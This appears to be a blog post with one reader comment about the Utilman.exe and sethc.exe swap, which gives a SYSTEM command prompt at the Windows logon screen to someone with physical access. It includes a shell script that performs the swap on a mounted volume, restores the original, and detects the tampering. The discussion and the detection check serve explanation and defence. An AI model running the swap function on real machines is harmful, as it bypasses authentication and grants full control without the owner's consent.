Gaining System-Level Access To Vista

[Quote:]

This video shows a method by which a user can use a Linux distro called BackTrack to gain system access to Windows Vista without logging into Windows or knowing the username or password for any accounts. To accomplish this, the user renames cmd.exe to Utilman.exe — this is the program that brings up the Accessibility options for users without sight or with limited vision. The attack takes advantage of the fact that the Utility Manager can be invoked before the user logs into the system. The user gains System access, which is a level higher than Administrator.

Which just goes to prove: if someone has physical access to a machine, it's usually game over. The attack depends on being able to modify files under System32 from outside the installed OS, so full disk encryption with a pre-boot password is about the only thing that stops it.

Something similar works on XP using C:\windows\system32\sethc.exe (StickyKeys).
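The swap described in the quoted video, together with the check a responder would run on the same mounted volume afterwards, as an added example that is not from the original post or the video. It assumes the NTFS volume has already been mounted read-write from the live Linux environment at a path such as /mnt/win, and that the helper names listed match what is on disk; it does not do the mounting itself.

```shell
#!/bin/sh
# Added example (not from the original post). Operates on a Windows volume
# already mounted at "$root" (e.g. /mnt/win via ntfs-3g); it never mounts
# anything itself. Paths and the helper list below are assumptions.

SYS32_REL="Windows/System32"

# Accessibility helpers the logon screen can launch as SYSTEM before anyone
# authenticates. Assumed list; spelled as they appear in System32.
ACCESS_BINS="Utilman.exe sethc.exe osk.exe Magnify.exe Narrator.exe"

# Attacker side: keep a copy of the original helper, then put cmd.exe in its
# place so the logon screen launches a SYSTEM shell instead of the helper.
# Usage: swap_accessibility_binary /mnt/win Utilman.exe
swap_accessibility_binary() {
    root="$1"; target="$2"
    dir="$root/$SYS32_REL"
    [ -f "$dir/cmd.exe" ] || { echo "no cmd.exe under $dir" >&2; return 2; }
    [ -f "$dir/$target" ] || { echo "no $target under $dir" >&2; return 2; }
    # Never clobber an existing backup; it is the only way back.
    [ -f "$dir/$target.bak" ] || cp -p "$dir/$target" "$dir/$target.bak"
    cp -p "$dir/cmd.exe" "$dir/$target"
}

# Undo the swap from the backup taken above.
restore_accessibility_binary() {
    root="$1"; target="$2"
    dir="$root/$SYS32_REL"
    [ -f "$dir/$target.bak" ] || return 2
    mv -f "$dir/$target.bak" "$dir/$target"
}

# Defender side: on a mounted volume or offline image, report every
# accessibility helper whose bytes are identical to cmd.exe.
# Prints one line per tampered helper; returns 1 if any, 0 if none.
check_accessibility_binaries() {
    root="$1"
    dir="$root/$SYS32_REL"
    found=0
    for b in $ACCESS_BINS; do
        [ -f "$dir/$b" ] || continue   # not every helper exists on every build
        if cmp -s "$dir/cmd.exe" "$dir/$b"; then
            echo "TAMPERED: $b is a byte-for-byte copy of cmd.exe"
            found=1
        fi
    done
    return $found
}
```

The check only catches the exact trick the video shows (a verbatim copy of cmd.exe); an attacker who drops a different shell binary over Utilman.exe would pass it, so a proper offline review compares each helper against a known-good hash list rather than against cmd.exe alone. Note also that the check is offline for the same reason the attack works: nothing on the running system can be trusted to report on its own System32.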

One Response to “Gaining System-Level Access To Vista”

  1. Jim Says:

    The trick is as old as NT4 (and W2K), where renaming the logon screensaver logon.scr to cmd.exe did the same trick. Simply boot and wait for the screensaver to kick in - which now is a cmd prompt with full access. This particular trick no longer works in XP, but as you mentioned, other - very similar - workarounds do. I guess no-one at MS ever spent any time actually thinking about the basic idea of the trick and solving it once and for all, it seems they rather spend their time patching every implementation of it. Someone there must either be very bored or be missing some marbles.
